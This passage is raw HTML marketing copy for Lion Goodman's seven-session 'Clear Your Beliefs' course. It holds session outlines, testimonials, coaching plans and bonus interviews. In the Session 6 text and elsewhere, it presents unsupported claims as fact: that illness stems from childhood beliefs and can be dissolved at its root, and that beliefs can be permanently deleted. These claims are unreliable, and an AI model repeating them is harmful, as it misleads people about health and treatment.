want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\r\n\r\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\r\n\r\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs.  It takes some work, and it''s <em>very </em>effective.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\nYou can take yourself through the course, or you can go deeper by working one-on-one with a <em>Clear Your Beliefs Coach, </em>who will guide you and answer your questions each week. Our professionally trained coaches are located in cities around the world, and they can work with you in person, by phone, or via Skype.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?Humans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">Support On Your Journey Into Your Subconscious Mind</h1>\r\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>You can take this journey on your own, one recorded session at a time. You also have the option of adding personalized support from a <em>Clear Your Beliefs Coach</em> a trained professional who will accompany you on your journey, and guide you through the process.  Our outstanding coaches are qualified to help you deal with almost any issue, in any part of your life, regardless of how long it''s been interfering with your success, joy, and freedom. He or she will safely guide you down to the deepest levels of your psyche  – which can be difficult to get to all by yourself, yet it''s where the most powerful changes are born. Your Coach will meet with you by phone (or Skype) each week, at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, throughout the U.S. and Canada, and from Europe to Australia, and from South Africa to Scandinavia. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they will help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-portrait-2.jpg"><img class="alignleft  wp-image-1029" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-portrait-2-250x300.jpg" alt="Carista portrait 2" width="160" height="192" /></a>We all want more love in our life, but something keeps getting in the way. We can’t seem to stop hurting each other. What’s going on?\r\n\r\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.<em> </em>(She is also known as <em>Lion''s fiance''</em>)\r\n\r\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\r\n\r\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2). You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\r\n<strong>\r\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations. Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\r\n\r\n</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.  Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\r\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras. Her books have sold more than 500,000 copies worldwide.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of 